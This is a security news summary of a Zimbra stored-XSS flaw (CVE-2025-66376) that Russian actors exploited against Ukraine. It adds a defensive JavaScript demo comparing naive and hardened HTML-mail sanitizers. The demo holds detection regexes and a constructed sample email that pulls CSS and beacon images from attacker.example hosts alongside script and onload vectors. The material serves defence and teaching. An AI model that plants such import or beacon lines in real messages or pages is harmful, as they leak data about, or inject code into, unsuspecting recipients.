Russian APT Exploits Zimbra Vulnerability Against Ukraine
Briefly

"The stored XSS bug could allow attackers to abuse Cascading Style Sheets (CSS) @import directives in email HTML. Insufficient sanitization of CSS content within HTML email messages could allow attackers to reference external resources or to inject inline scripts that would be executed when the recipient opens the message in a browser."
"The script executes silently in the browser and begins harvesting credentials, session tokens, backup 2FA codes, browser-saved passwords, and the contents of the victim's mailbox going back 90 days with all the data exfiltrated over both DNS and HTTPS."
"The successful exploitation of the bug for remote code execution (RCE) allows threat actors to compromise the recipient's email account and the Zimbra environment."
CVE-2025-66376, a stored XSS vulnerability in Zimbra Collaboration's Classic UI with a CVSS score of 7.2, was patched in November 2025 in versions 10.1.13 and 10.0.18. The flaw stems from insufficient sanitization of CSS content in HTML emails: an attacker can use CSS @import directives to pull in external resources or to inject inline script. Russian state-sponsored threat actors exploited the vulnerability in attacks against Ukraine, embedding JavaScript in email bodies that runs as soon as the recipient opens the message in the Classic UI. The scripts harvest credentials, session tokens, 2FA backup codes, browser-saved passwords, and 90 days of mailbox contents, and exfiltrate the data over both DNS and HTTPS. Because the payload is stored in the mailbox and fires on view, patching alone does not revoke anything already taken: session tokens, passwords and backup codes harvested before the upgrade remain usable until rotated. CISA added the vulnerability to its Known Exploited Vulnerabilities catalog, mandating that federal agencies patch within two weeks.
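To make the weakness class concrete, here is an added illustration that is neither Zimbra's code nor the exploit used in these attacks. It shows a sanitizer of the kind that strips script tags and event-handler attributes but passes CSS through untouched, so an @import in a style block survives, beside a hardened version that also strips @import, remote url() references and legacy expression() from style blocks and style attributes. The sample message, the attacker.example hostnames and all function names are constructed for this demo.

```javascript
// Added example (not Zimbra's code, not the real payload). Demonstrates why an
// HTML-mail sanitizer must treat CSS as an attack surface, not just <script>.

// Non-global patterns for detection; global copies are built for replacement so
// RegExp.lastIndex state never leaks between calls.
const CSS_IMPORT_RE = /@import\b[^;]*;?/i;                 // @import url(...) / @import "..."
const CSS_REMOTE_URL_RE = /url\(\s*(['"]?)\s*(?:https?:|\/\/|javascript:|data:)[^)]*\1\s*\)/i;
const CSS_EXPRESSION_RE = /expression\s*\([^)]*\)/i;       // legacy IE script-in-CSS

// Naive sanitizer: removes <script> blocks and on* handler attributes but
// trusts everything inside <style> and style="". The @import is left intact.
function naiveSanitize(html) {
  return html
    .replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '')
    .replace(/\son\w+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, '');
}

// True if a CSS fragment can reach an external origin or execute script.
function cssHasExternalReference(css) {
  return CSS_IMPORT_RE.test(css) || CSS_REMOTE_URL_RE.test(css) || CSS_EXPRESSION_RE.test(css);
}

// Remove the dangerous constructs; remote url() values become "none" so the
// declaration stays syntactically valid.
function stripCssReferences(css) {
  return css
    .replace(new RegExp(CSS_IMPORT_RE.source, 'gi'), '')
    .replace(new RegExp(CSS_REMOTE_URL_RE.source, 'gi'), 'none')
    .replace(new RegExp(CSS_EXPRESSION_RE.source, 'gi'), '');
}

// Hardened sanitizer: everything the naive one does, plus CSS cleaning for
// both <style> blocks and inline style attributes.
function hardenedSanitize(html) {
  let out = naiveSanitize(html);
  out = out.replace(/(<style\b[^>]*>)([\s\S]*?)(<\/style>)/gi,
    (_, open, css, close) => open + stripCssReferences(css) + close);
  out = out.replace(/\sstyle\s*=\s*("([^"]*)"|'([^']*)')/gi,
    (_, quoted, dq, sq) => {
      const css = dq !== undefined ? dq : sq;
      const q = quoted[0];
      return ' style=' + q + stripCssReferences(css) + q;
    });
  return out;
}

// Triage helper for stored mail: list the targets of every @import so that
// already-delivered messages can be checked, since patching does not remove them.
function findCssImports(html) {
  const hits = [];
  const re = /@import\s+(?:url\(\s*)?(['"]?)([^'")\s;]+)\1/gi;
  let m;
  while ((m = re.exec(html)) !== null) hits.push(m[2]);
  return hits;
}

// Constructed sample message: an @import and remote url() in a <style> block,
// a remote url() in an inline style, plus the classic script/handler vectors.
const SAMPLE_MAIL = [
  '<html><head><style>',
  '@import url("https://attacker.example/steal.css");',
  'body { background: url(https://attacker.example/beacon.png); }',
  '</style></head>',
  '<body onload="alert(1)">',
  '<p style="color:red; background:url(\'https://attacker.example/b.png\')">Invoice attached</p>',
  '<script>alert(2)</script>',
  '</body></html>',
].join('\n');

console.log('naive leaves @import:', /@import/i.test(naiveSanitize(SAMPLE_MAIL)));
console.log('hardened output:\n' + hardenedSanitize(SAMPLE_MAIL));
console.log('imports found in stored message:', findCssImports(SAMPLE_MAIL));
```

The regex approach is only for illustration: a production filter should parse the HTML and the CSS with real parsers and allowlist properties and schemes rather than blocklist patterns, since obfuscation (comments inside @import, escaped characters, unusual whitespace) defeats simple matching. The findCssImports helper is the part worth keeping in an incident: the malicious message remains in the mailbox after the upgrade, so scanning stored mail for @import targets gives both an indicator and a list of hosts to block.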
Read at SecurityWeek